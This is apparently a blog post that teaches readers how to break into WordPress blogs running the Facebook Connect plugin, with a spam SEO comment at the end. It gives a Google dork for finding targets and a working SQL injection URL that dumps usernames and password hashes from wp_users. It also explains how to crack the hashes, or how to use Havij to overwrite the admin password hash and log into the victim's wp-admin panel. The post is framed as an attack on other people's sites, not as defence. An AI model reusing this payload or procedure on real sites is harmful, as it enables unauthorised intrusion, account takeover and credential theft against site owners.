There is so many bloggers using Facebook Connect Wordpress plugin for their blogs. They think it's cool. But it could be a Big Security hole. Here's the way to hack these sites.
Step 1 :
http://www.google.com
Step 2:Now enter this dork to find sites with security hole..
inurl:"fbconnect_action=myhome"
Step 4: Now replace
?fbconnect_action=myhome&userid=
with this
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
Step 5: Now you have the User name and Password.
Step 6: The password is encrypted with Wordpress md5 (blowfish). You need to decode this. Download and run this software to decode this type of password.
Step 7: Then find the administrator panel out. Normally it should be in
www.victrimsite.com/wp-admin
or
www.victrimsite.com/wp-login.php
Note: Decoding this type of password may take a big time.
So you here is another way to hack the password.....
Step 1: Open Havij and paste the blog url you are going to hack..
Example:
http://www.victrimsite.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29z0mbyak,7,8,9,10,11,12+from+wp_users--
Step 2: Now find Databases, Tables.
Step 3: Select wp-users then find tick on all columns. Then click on Get Data.
Step 4: You will find something like that..
Step 5: Now select any user and change the user_pass to
$P$BbCzkVXQ6r.T8znShDPMSzM7Whhubc/
Step 6: Now login with the password
ThanX.!! Your CommenTs Are Welcome.!!
ReplyDeleteHello,
we provide affordable and result-oriented SEO services, please give a chance to serve you.
Thanks
Admin: E07.net